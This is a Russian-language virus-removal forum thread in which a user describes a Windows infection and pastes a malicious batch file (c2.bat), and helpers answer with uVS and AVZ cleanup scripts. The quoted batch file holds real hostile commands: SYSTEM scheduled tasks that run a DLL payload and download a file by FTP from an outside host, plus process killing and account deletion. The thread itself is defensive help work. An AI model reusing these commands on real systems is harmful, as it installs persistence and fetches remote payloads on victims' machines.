Перейти к содержанию

Win32:Pup-gen или Backdoor.Win32.Mirai


Ришат

Рекомендуемые сообщения

Здравствуйте. Проблема возникла в день когда я закрывал не нужные порты, как оказалось в дальнейшем нужные. Проблема была обнаружена случайно в диспетчере задач начали грузится неизвестные мне процессы.  За первое сканирование Аваст ничего не нашел. При чистке ccleaner в автозагрузке прописались 2 строки (Примерные строки):
regsvr32 /u /s /i:вирусная ссылкаscrobj.dll а так же 
msiexec.exe /i вирусная ссылка
 
в реестре
"HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1" "HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start"  
 
в папке винды был найден файл и логи  Windows/debug/item.dat
через день был создан в этой же папке БАТНИК c2.bat
 

БАТНИК c2.bat:

 

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y 
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit

 

 

 
 
Просканировал и Avast (нашел C:\windows\notepad.exe как Win32:Pup-gen ) Dr.Web и Kaspersky вроде ничего не нашли.
 
Прошелся по сайтам просканировал по удалял программами AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe
 
В результате в папке  C:\WINDOWS\Debug\ остается файл лог PASSWD.LOG и не удаляется. В автозагрузка start start1 так и отаются.
Может вирус остал незнаю, но рисковать не охота, да и переустанавливать винду тоже. Стоит ли волноваться ?
 
Во вложении логи и скрины  AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe
 
Если что не так вы уж извините я не "шарю".
 
Надеюсь на вашу поддержку заранее спасибо.

вирус0логу.rar

Изменено пользователем regist
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте,


Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Выполните скрипт в uVS:

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
OFFSGNSAVE
BREG
;---------command-block--------
zoo %SystemRoot%\DEBUG\C2.BAT
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref HTTP://INET123.RU/?CX=PARTNER-PUB-7107628092852806%3ASXITI5-KTQK&COF=FORID%3A10&IE=UTF-8&Q={SEARCHTERMS}&SA=%CF%EE%E8%F1%EA&SITEURL=INET123.RU%2F#881
delref %SystemDrive%\DOCUMENTS AND SETTINGS\LIS\LOCAL SETTINGS\TEMP\40C7023A.SYS
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\GOOGLEUPDATE.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.169\PSMACHINE.DLL
del %SystemRoot%\DEBUG\C2.BAT
delref %SystemRoot%\TEMP\34A61A48-9270-4DE0-8922-65BADD484D9E
delref %SystemRoot%\TEMP\35872F97-8A73-4D6F-8156-CC38CF6D951E
delref %SystemRoot%\TEMP\4F9B30B2-983E-4016-B4CB-95AB3F09B805
delref %SystemRoot%\TEMP\5EDAB485-849A-44AD-9367-165D57A39241
delref %SystemRoot%\TEMP\421D46C5-7BB9-4E0B-B8B6-8DE4F52E9D63
delref %SystemRoot%\TEMP\C80C1669-02D7-47E2-984B-A2291EA0D87C
delref %SystemRoot%\TEMP\FD6D963D-8016-4E10-8B7D-B41625551AC3
apply

restart 


Прикпепите автологер согласно правилам.

Ссылка на комментарий
Поделиться на другие сайты


AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('msiexec.exe','');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
BC_ImportQuarantineList;
BC_Activate;
 ExecuteRepair(1);
RebootWindows(false);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)



AVZ -> Файл -> Мастер поиска и устранения проблем -> Системные проблемы -> Пуск -> Отметьте пункт указанный выше -> Исправить отмеченные проблемы.
 
 >>  Установлена большая задержка перед открытием меню (более секунды)

 
- Подготовьте лог AdwCleaner и приложите его в теме.
 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Сергей Владивостокский
      От Сергей Владивостокский
      Не могу удалить - mem:trojan win32 sepeh gen
      Антивирус его удаляет только с перезагрузкой, но каждый раз он появляется вновь 
    • Евгений Михайлович Федоров
      От Евгений Михайлович Федоров
      Существует множество мифов о поколении Z и о том, как они используют технологии. Пришло время взглянуть на реальные модели поведения, которые выходят за рамки активного использования социальных сетей. Каждое поколение по-своему уникально, у него свои привычки, взгляды, стандарты и ожидания. Так что же нужно учитывать при разработке дизайна для поколения Z? Давайте поближе познакомимся с поколением Z, с тем, как они используют технологии, и с тем, почему, возможно, стоит игнорировать распространённые советы по дизайну и делать противоположное тому, что обычно рекомендуется.
      Gen Z: самое разнообразное и инклюзивное #
      Когда мы говорим о поколении Z, мы обычно имеем в виду людей, родившихся в период с 1995 по 2010 год. Конечно, делать универсальные заявления о когорте, в которой одни — взрослые люди в возрасте около 30 лет, а другие — школьники, в лучшем случае неэффективно, а в худшем — неправильно, но есть некоторые особенности, которые выделяют их по сравнению с предыдущими поколениями.
      Поколение Z — самое разнообразное поколение с точки зрения расы, этнической принадлежности и идентичности. Исследования показывают, что современные молодые люди заботливы и активны и далеки от того, чтобы быть «медлительными, пассивными и бездумными», как их часто описывают. На самом деле они готовы отстаивать свою позицию и менять свои привычки, если глубоко верят в определённую цель и задачу. Конечно, на этом пути их ждёт множество отвлекающих факторов, но вера в справедливость и целеустремлённость имеют огромную ценность.
      Их ценности отражают тот факт, что доступность, инклюзивность, экологочность и баланс между работой и личной жизнью являются главными приоритетами для поколения Z, и они ценят опыт, принципы и социальную позицию больше, чем имущество.
      О чем глубоко заботится Gen Z #
      Поколение Z выросло в окружении технологий, поэтому неудивительно, что цифровой опыт им хорошо знаком и понятен. С другой стороны, цифровой опыт часто бывает в лучшем случае неоптимальным — медленным, недоступным, запутанным и разочаровывающим. Кроме того, интернет переполнен преувеличениями и общими, но поверхностными заявлениями. Поэтому неудивительно, что представители поколения Z по умолчанию крайне скептически относятся к брендам и рекламе (и это правильно!) и полагаются почти исключительно на социальные сети, инфлюенсеров и коллег как на основные каналы поиска информации.
      Иногда им может быть сложно понять, что реально, а что нет, но они очень избирательны в отношении источников информации. Они всегда на связи и привыкли следить за событиями по мере их развития, поэтому неудивительно, что поколение Z не отличается терпением.
      И, конечно же, поколение Z любит короткие материалы, но это не обязательно означает, что у них короткая концентрация внимания. Концентрация внимания зависит от контекста, поскольку документальные фильмы и литература входят в число любимых жанров поколения Z.
      Проектирование для Gen Z #
      Большинство рекомендаций по дизайну для поколения Z сосредоточены на создании «короткого, лаконичного, удобного для перекуса» контента. Такой контент оптимизирован для очень короткого периода концентрации внимания, потребления контента в стиле TikTok и упрощён до основных сообщений. Я бы настоятельно рекомендовал нам делать наоборот.
      Мы не должны недооценивать поколение Z как поколение с низкой концентрацией внимания и острой потребностью в мгновенном удовлетворении. У поколения Z очень сильные убеждения и ценности, но они также по своей природе любопытны и хотят изменить мир. Мы можем рассказать чертовски хорошую историю. Увлечь и вовлечь. Заставить людей задуматься. Многие представители поколения Z очень амбициозны и мотивированы, и они хотят, чтобы им бросали вызов и чтобы они добивались успеха. Давайте поддержим их в этом. А для этого нам нужно оставаться искренними и настоящими.
      Оставайтесь искренними #
      Как отметила Мишель Уинчестер, у представителей поколения Z очень разные взгляды и мнения, и они обладают проницательностью, позволяющей им распознавать недостоверный контент. Именно здесь проявляется недоверие к ИИ, а также усталость от ИИ. Как Нилай Патель упомянул в шоу Эзры Кляйна, сегодня, когда кто-то говорит, что что-то «сгенерировано ИИ», это обычно не похвала, а свидетельство того, насколько это плохо и ненадёжно.
      Поколение Z ожидает большего. Поэтому бренды, которые ценят искренность, честность и подлинность, воспринимаются как более надёжные по сравнению с брендами, у которых нет своего мнения, которые не занимают позицию, не действуют в соответствии со своими убеждениями и принципами. Например, кампания «Сохраняй красоту настоящей» от Dove (показана ниже) демонстрирует ценность настоящей человеческой красоты, которую ИИ так часто упускает из виду и так часто преувеличивает.
      Доступность превыше всего #
      Поскольку поколение Z невероятно разнообразно, их потребности также чрезвычайно разнообразны и требовательны. Это не обязательно означает настройку функций или полную адаптацию интерфейса в соответствии с пользовательскими настройками или предпочтениями. Но это означает предоставление доступного интерфейса «из коробки».
      Простые вещи имеют значение. Достаточный цветовой контраст. Ссылки, которые выглядят как ссылки. Кнопки, которые выглядят как кнопки. Формы, которые разбиты на простые шаги. Различные варианты гендера и идентичности. Правильный порядок вкладок. Доступность клавиатуры. Уменьшенное количество движений для людей, которые выбирают уменьшенное количество движений при укачивании. Тёмный и светлый режимы.
      На самом деле в этом нет ничего революционного. Просто базовые вещи, которые помогают сосредоточиться и выполнять задачи. На самом деле доступность лучше для всех — не только для поколения Z (которое ожидает и требует этого), но и для абсолютно всех людей в мире.
      Только для мобильных устройств, не для мобильных в первую очередь #
      Многие макеты дизайна, которые мы создаём сегодня, обычно разрабатываются и представляются сначала на больших экранах. Однако, в зависимости от вашей пользовательской базы, подавляющее большинство пользователей (особенно это касается поколения Z) будут использовать почти исключительно мобильные устройства для доступа к вашим продуктам и услугам. Для корпоративного программного обеспечения это, конечно, не так, но молодые представители поколения Z вряд ли будут использовать потребительские продукты на настольных устройствах.
      Возьмите за правило сначала показывать свои макеты дизайна в мобильном режиме. Помогите людям лучше читать. Дизайн контента как никогда важен — особенно при разработке для мобильных экранов. Вот несколько рекомендаций, о которых следует помнить:
      Избегайте длинных стен текста → не более 50 слов в абзаце.
      Избегайте длинных предложений → максимум. 20 слов в предложении.
      Сначала пиши для мобильных устройств: кратко, ясно и лаконично.
      Краткое изложение доступно даже для юридических документов.
      Используйте перевернутую пирамиду: сначала ключевые идеи, подробности ниже.
      Нет ничего эффективнее, чем удаление отходов и пуха.
      Субтитры включены по умолчанию #
      Многие люди, особенно представители поколения Z, в наши дни по умолчанию включают субтитры. Возможно, они не владеют языком, на котором ведётся трансляция, или не совсем понимают акцент некоторых говорящих, или у них нет наушников под рукой, они не хотят их использовать или не могут их использовать. Короче говоря, субтитры лучше для всех, и они увеличивают рентабельность инвестиций и аудиторию.
      Гарет Форд Уильямс составил визуальный словарь субтитров и любезно предоставил шпаргалку в формате PDF, которой обычно пользуются профессиональные субтитровщики. Существуют общепринятые правила создания субтитров, и вот некоторые из них, которые я нашёл весьма полезными при создании субтитров для своего видеокурса:
      Разделите свои предложения на две относительно равные части, как пирамиду (40 символов на строку для верхней строки, чуть меньше для нижней строки);
      Всегда сохраняйте среднюю скорость от 20 до 30 символов в секунду;
      Последовательность должна длиться не более от 1 до 8 секунд;
      Всегда указывайте имя или должность человека вместе;
      Не прерывайте линию после объединения;
      Подумайте о том, чтобы выровнять подписи с несколькими линиями слева.
      На YouTube пользователи могут выбрать шрифт для субтитров и между моноширинными и пропорциональными шрифтами с засечками и без засечек, повседневными, рукописными и строчными шрифтами. Но, возможно, в дополнение к стилистическим деталям мы могли бы предложить тщательный выбор шрифтов, чтобы помочь зрителям с разными потребностями. Например, это может быть шрифт для людей с дислексией или шрифт с повышенной читаемостью.
      Кроме того, мы могли бы отображать предустановки для различных вариантов высокой контрастности субтитров. Это позволило бы пользователям быстрее выбирать, затрачивая меньше усилий на настройку правильного сочетания цветов и прозрачности. Тем не менее, было бы полезно предоставить более сложные варианты на случай, если они понадобятся пользователям.
      Поддержите внутреннюю мотивацию #
      С другой стороны, во времена мгновенного удовлетворения от лайков, репостов и рейтингов люди часто понимают, что чувство достижения зависит от внешних сигналов, таких как охват или внимание других людей. Тем важнее поддерживать внутреннюю мотивацию.
      Как отметила Паула Гомеш, внутренняя мотивация характеризуется тем, что человек совершает действия просто ради них самих. Люди делают что-то, потому что им это нравится. Это когда они глубоко вовлечены в какое-то занятие и получают от него удовольствие, не нуждаясь во внешнем вознаграждении или давлении.
      Обычно для этого требуется 3 компонента:
      Компетентность подразумевает потребность чувствовать себя способным достичь желаемого результата.
      Автономия — это потребность чувствовать контроль над собственными действиями, поведением и целями.
      Близость отражает потребность в ощущении принадлежности и привязанности к другим людям.
      С практической точки зрения это означает, что нужно готовить людей к успеху. Заранее предоставлять им знания, документы и навыки, которые им понадобятся. Накапливать знания, не обязательно вознаграждая за них баллами. Это также означает, что нужно давать людям возможность чувствовать себя ответственными за решения и работу, которую они выполняют. И добавлять совместные цели, которые потребуют сотрудничества с членами команды и коллегами.
      Поощряйте критическое мышление #
      Чем моложе люди, тем сложнее им отличить правду от вымысла. По возможности указывайте источники или хотя бы объясняйте, где можно найти конкретные детали, подтверждающие ваши утверждения. Поощряйте людей делать выводы и создавайте контент, который будет их поддерживать, — с научными статьями, достоверными отзывами, проверенными комментариями и разными мнениями.
      И: вам не обязательно избегать технических деталей. Не делайте их обязательными для прочтения и понимания, но сделайте их доступными на случай, если читателям или зрителям будет интересно.
      В наше время, когда так много фальшивого, преувеличенного, нечестного и сгенерированного искусственным интеллектом контента, этого может быть достаточно, чтобы быть воспринятым как подлинный, достойный доверия и заслуживающий внимания контент для очень избирательного и требовательного поколения Z.
      Хороший дизайн для всех #
      Я продолжаю твердить одно и то же, как заезженная пластинка, но чем лучше доступность, тем лучше для всех. Как вы, надеюсь, заметили, многие характеристики и ожидания, которые мы видим у поколения Z, полезны и для других поколений. Это просто хороший, честный, аутентичный дизайн. И это самое сердце хорошего UX.
      Я не упомянул, что поколение Z искренне ценит обратную связь и уважает платформы, которые прислушиваются к их мнению и вносят изменения на основе их отзывов. Поэтому лучшее, что мы, дизайнеры, можем сделать, — это активно вовлекать поколение Z в процесс проектирования. Проектировать вместе с ними, а не для них.
      И, что самое важное: в поколении Z, возможно, впервые в истории, инклюзивность и доступность становятся стандартным требованием для всех цифровых продуктов. Вместе с этим приходит чувство справедливости, многообразия и уважения. И лично я твёрдо убеждён, что это здорово — и свидетельствует о том, насколько замечательны представители поколения Z.
      Подведение итогов #
      Большая часть поколения Z ориентирована не на мобильные устройства, а только на мобильные.
      Для некоторых основной поисковой системой является YouTube, а не Google.
      Некоторые не знают и никогда не слышали о Internet Explorer.
      Доверяйте только проверенным отзывам клиентов, влиятельным лицам, друзьям.
      Привык следить за событиями вживую по мере их развития → немного терпения.
      Экологичность, повторное использование, баланс между работой и личной жизнью - главные приоритеты.
      Предпочитаю вход в социальную сеть как самый быстрый метод аутентификации.
      Обычно баннеры с файлами cookie игнорируются или закрываются без согласия пользователя.
      Полагайтесь на социальные доказательства, честные обзоры / фотографии, подлинность.
      Наиболее вероятное поколение, которое предоставит ссылку на продукт.
      Обычно субтитры к видео включаются по умолчанию.
       
    • Sweethome-2005
      От Sweethome-2005
      Поймал шифровальщик. Вероятно влез через открытый проброс порта RDP на роутере.
      шифрованные файлы.rar Addition.rar FRST.rar
    • MotherBoard
      От MotherBoard
      Компания Qualcomm представила новый мобильный процессор среднего уровня Snapdragon 7+ Gen 3. Чип является эволюцией обычного Snapdragon 7 Gen 3, получившего более производительные вычислительные ядра. В частности, основным ядром в составе новинки выступает Cortex-X4. Оно поддерживает ИИ-возможности, присущие флагманским смартфонам на базе Snapdragon 8-й серии.

      Источник

    • valeriithehuman
      От valeriithehuman
      Скачивал контент, а вместо контента получил троян и много-много вирусов (с ними справился стандартный антивирус виндовс (надеюсь))
      Скачал файл, начал установку программы, антивирус сразу сбросил выполнение всех программ и начал очистку. После отчистки остался только этот троян.
      Все файлы, которые я скачал, были удалены антивирусом и мной в ручную
      заранее спасибо за помощь 
      CollectionLog-2024.02.07-19.14.zipShortcut.txtFRST.txtAddition.txt
×
×
  • Создать...